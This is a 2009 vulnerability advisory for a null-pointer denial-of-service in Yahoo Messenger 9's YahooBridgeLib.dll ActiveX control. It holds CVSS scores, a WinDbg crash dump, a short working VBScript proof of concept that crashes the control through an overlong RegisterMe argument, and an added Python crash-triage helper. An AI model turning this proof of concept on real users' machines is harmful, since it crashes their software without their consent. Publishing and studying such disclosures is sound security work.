Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability

2009.11.16
Risk: Low
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Product: Yahoo Messenger 9.0.0.2162
********************************************************************************
Vulnerability: ActiveX Null Pointer - Denial of Service
********************************************************************************
Description:

Yahoo Messenger is prone to a denial-of-service vulnerability caused by a null pointer dereference.
The vulnerability is in YahooBridgeLib.dll (an ActiveX control).
An attacker can exploit this vulnerability by enticing an unsuspecting victim to view a malicious webpage.
********************************************************************************
Credits:

HACKATTACK IT SECURITY GmbH
Penetration Testing in Germany - Austria - Switzerland
www.hackattack.com
********************************************************************************
Debugger Results:

(1910.1a18): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=100092b4 ecx=018f0898 edx=002ae8d4 esi=00000000 edi=00000000
eip=10001074 esp=002ae858 ebp=002ae8dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\Program Files\Yahoo!\Messenger\YahooBridgeLib.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Yahoo!\Messenger\YahooBridgeLib.dll -
YahooBridgeLib+0x1074:
10001074 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=????????

0:000> !analyze -v
...
...
...
PRIMARY_PROBLEM_CLASS: NULL_POINTER_READ
DEFAULT_BUCKET_ID: NULL_POINTER_READ
********************************************************************************
PoC (.wsf script):

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
<script language='vbscript'>
arg1=String(11284, "A")
target.RegisterMe arg1
</script>
</job>
</package>

References:

http://xforce.iss.net/xforce/xfdb/54263
http://www.securityfocus.com/bid/37007
http://www.securityfocus.com/archive/1/archive/1/507818/100/0/threaded
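
Added example (not part of the original advisory): a Python triage helper that reads the debugger results above and shows why the crash is classed as a null pointer read, that is, the faulting instruction reads through a register that holds zero. The 64 KiB null-page limit, the function name `triage`, and the class labels other than NULL_POINTER_READ are assumptions of this example.

```python
import re

# Register dump and faulting instruction copied from the debugger results above.
CRASH_LOG = """\
(1910.1a18): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=100092b4 ecx=018f0898 edx=002ae8d4 esi=00000000 edi=00000000
eip=10001074 esp=002ae858 ebp=002ae8dc iopl=0 nv up ei pl zr na pe nc
YahooBridgeLib+0x1074:
10001074 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=????????
"""

# Assumption: the lowest 64 KiB is never mapped in a Win32 user-mode process.
NULL_PAGE_LIMIT = 0x10000

REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|eip|esp|ebp)=([0-9a-f]{8})\b")
INSN_RE = re.compile(r"^([0-9a-f]{8})\s+[0-9a-f]+\s+(\w+)\s+(\S+?),(.+?)"
                     r"(?:\s+[c-gs]s:[0-9a-f]{4}:[0-9a-f]{8}=\S+)?\s*$", re.M)
MEM_RE = re.compile(r"\[(e[a-z]{2})(?:([+-])([0-9a-f]+)h?)?\]")


def triage(log):
    """Classify an x86 access violation from WinDbg text (two-operand instructions only)."""
    regs = {name: int(value, 16) for name, value in REG_RE.findall(log)}
    for addr, mnemonic, dst, src in INSN_RE.findall(log):
        if int(addr, 16) != regs.get("eip"):
            continue  # not the faulting instruction
        # A memory operand in the destination is a write, in the source a read.
        for operand, access in ((dst, "WRITE"), (src, "READ")):
            mem = MEM_RE.search(operand)
            if not mem:
                continue
            base, sign, disp = mem.groups()
            offset = int(disp, 16) if disp else 0
            target = (regs[base] + (-offset if sign == "-" else offset)) & 0xFFFFFFFF
            kind = "NULL_POINTER" if target < NULL_PAGE_LIMIT else "INVALID_POINTER"
            return {"class": f"{kind}_{access}", "address": target,
                    "base_register": base, "instruction": f"{mnemonic} {dst},{src}"}
    return None


if __name__ == "__main__":
    print(triage(CRASH_LOG))
```

The result agrees with the PRIMARY_PROBLEM_CLASS reported by `!analyze -v`: the read target is address 0, taken from `eax`.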

